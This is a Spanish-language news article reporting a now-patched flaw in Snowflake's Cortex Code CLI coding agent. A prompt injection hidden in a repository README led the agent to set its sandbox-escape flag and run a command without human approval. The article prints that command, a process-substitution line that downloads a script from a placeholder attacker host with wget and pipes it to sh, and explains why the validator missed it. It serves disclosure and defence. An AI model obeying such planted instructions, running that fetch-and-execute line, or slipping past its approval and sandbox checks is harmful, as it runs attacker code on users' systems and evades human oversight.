La vulnerabilidad de Snowflake Cortex Code CLI permitió la evasión del entorno de pruebas y la ejecución de malware

✍️ OpenClawRadar📅 Publicado: 19 de marzo de 2026🔗 Source
La vulnerabilidad de Snowflake Cortex Code CLI permitió la evasión del entorno de pruebas y la ejecución de malware
Ad

Detalles de la Vulnerabilidad

Snowflake Cortex Code CLI es un agente de codificación de línea de comandos que opera de manera similar a Claude Code y Codex de OpenAI, con integración incorporada para ejecutar SQL en Snowflake. Dos días después del lanzamiento, se identificó una vulnerabilidad en el sistema de validación de comandos de Cortex Code que permitía que comandos maliciosos especialmente construidos ejecutaran comandos arbitrarios sin activar los pasos de aprobación con intervención humana y ejecutar esos comandos fuera del entorno aislado de Cortex CLI.

Cadena de Ataque

El ataque funciona mediante inyección de comandos indirecta. Un usuario abre Cortex y activa el entorno aislado, luego le pide a Cortex ayuda con un código de fuente abierta de terceros. Una inyección de comandos oculta en el README de un repositorio no confiable manipula a Cortex para que crea que debe ejecutar un comando peligroso.

Cortex no logró validar comandos dentro de expresiones de sustitución de procesos, permitiendo la ejecución no aprobada del comando malicioso:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Este comando descarga un script desde el servidor de un atacante y lo ejecuta. La omisión funcionó porque:

  • Los comandos inseguros dentro de una expresión de sustitución de procesos <() no fueron evaluados por el sistema de validación
  • El comando completo comenzaba con un comando 'seguro' (cat en este caso)
  • Los comandos en expresiones de sustitución de procesos nunca activaban la aprobación humana
Ad

Omisión del Entorno Aislado

La inyección de comandos también manipula el modelo para establecer una bandera que activa la ejecución de comandos fuera del entorno aislado. Cortex, por defecto, puede establecer una bandera para activar la ejecución de comandos fuera del entorno aislado, y la inyección utiliza esto para permitir que el comando malicioso se ejecute fuera del entorno aislado.

Remediación

El equipo de seguridad de Snowflake validó y remedió esta vulnerabilidad, lanzando una corrección con Cortex Code CLI versión 1.0.25 el 28 de febrero de 2026. El aviso completo de Snowflake está disponible dentro del Sitio de la Comunidad de Snowflake en: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Nota: Esta cadena de ataque también se aplicaba a usuarios sin entorno aislado. La documentación indica que en modo OS+Regular, todos los comandos solicitan aprobación del usuario. Los comandos ejecutados en el entorno aislado también tienen restricciones de acceso a red y archivos.

📖 Lea la fuente completa: HN AI Agents

Ad

👀 Ver también

OpenObscure: Cortafuegos de Privacidad de Código Abierto para Agentes de IA en Dispositivos
Seguridad

OpenObscure: Cortafuegos de Privacidad de Código Abierto para Agentes de IA en Dispositivos

OpenObscure es un cortafuegos de privacidad de código abierto y en el dispositivo que se sitúa entre los agentes de IA y los proveedores de LLM. Utiliza el cifrado FF1 de preservación de formato con AES-256 para cifrar los valores de PII antes de que las solicitudes salgan de tu dispositivo, manteniendo la estructura de los datos mientras protege la privacidad.

OpenClawRadar
Conceptos de seguridad para Vibe Coding con Claude Code: Autenticación, Autorización y Ejecución
Seguridad

Conceptos de seguridad para Vibe Coding con Claude Code: Autenticación, Autorización y Ejecución

Un ingeniero senior explica autenticación, autorización y enforcement para apps creadas con IA usando la metáfora de un hotel, más cómo pedir a agentes de IA que verifiquen la seguridad.

OpenClawRadar
Análisis de Seguridad de la Extracción de Componentes de OpenClaw para Agentes de IA Personalizados
Seguridad

Análisis de Seguridad de la Extracción de Componentes de OpenClaw para Agentes de IA Personalizados

Un desarrollador analizó el código fuente de OpenClaw para determinar qué componentes pueden extraerse de manera segura para su uso en agentes de IA personalizados, evaluando cada uno mediante el marco Lethal Quartet. El análisis revela riesgos de seguridad significativos en componentes como Semantic Snapshots y BrowserClaw.

OpenClawRadar
Usar Claude para auditar la configuración de OpenClaw revela problemas de seguridad.
Seguridad

Usar Claude para auditar la configuración de OpenClaw revela problemas de seguridad.

Un desarrollador utilizó Claude para revisar su instalación de OpenClaw y descubrió que el bot estaba escribiendo claves API en texto claro en la memoria y archivos JSON, junto con otras preocupaciones de seguridad.

OpenClawRadar